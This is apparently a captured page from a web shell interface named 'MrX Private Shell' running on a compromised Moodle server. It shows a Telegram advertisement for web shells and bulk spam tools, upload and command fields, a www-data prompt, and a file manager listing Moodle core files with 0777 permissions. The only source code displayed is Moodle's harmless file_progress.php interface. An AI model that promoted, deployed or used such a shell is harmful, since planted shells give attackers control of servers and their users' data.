__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

/**
 * Simple interface for receiving progress during long-running file
 * operations.
 *
 * In some cases progress can be reported precisely. In other cases,
 * progress is indeterminate which means that the progress function is called
 * periodically but without information on completion.
 *
 * @package core_files
 * @copyright 2013 The Open University
 * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
interface file_progress {
    /**
     * @var int Constant used for indeterminate progress.
     */
    const INDETERMINATE = -1;

    /**
     * Called during a file processing operation that reports progress.
     *
     * This function will be called periodically during the operation, assuming
     * it is successful.
     *
     * The $max value will be the same for each call to progress() within an
     * operation.
     *
     * If numbers (rather than INDETERMINATE) are provided, then:
     * - The $progress value will either be the same as last call, or increased
     *   by some value (not necessarily 1)
     * - The $progress value will be less than or equal to the $max value.
     *
     * There is no guarantee that this function will be called for every value
     * in the range, or that it will be called with $progress == $max.
     *
     * The function may be called very frequently (e.g. after each file) or
     * quite rarely (e.g. after each large file).
     *
     * When creating an implementation of this function, you probably want to
     * do the following:
     *
     * 1. Check the current time and do not do anything if it's less than a
     *    second since the last time you reported something.
     * 2. Update the PHP timeout (i.e. set it back to 2 minutes or whatever)
     *    so that the system will not time out.
     * 3. If the progress is unchanged since last second, still display some
     *    output to the user. (Setting PHP timeout is not sufficient; some
     *    front-end servers require that data is output to the browser every
     *    minute or so, or they will time out on their own.)
     *
     * @param int $progress Current progress, or INDETERMINATE if unknown
     * @param int $max Max progress, or INDETERMINATE if unknown
     */
    public function progress($progress = self::INDETERMINATE, $max = self::INDETERMINATE);
}

Filemanager

Name Type Size Permission Actions
tests Folder 0777
file_archive.php File 6.1 KB 0777
file_exceptions.php File 4.64 KB 0777
file_packer.php File 5.68 KB 0777
file_progress.php File 2.95 KB 0777
file_storage.php File 99.29 KB 0777
file_system.php File 25.45 KB 0777
file_system_filedir.php File 19.55 KB 0777
mbz_packer.php File 7.28 KB 0777
stored_file.php File 40.54 KB 0777
tgz_extractor.php File 20.26 KB 0777
tgz_packer.php File 33.63 KB 0777
zip_archive.php File 29.22 KB 0777
zip_packer.php File 22.89 KB 0777
Filemanager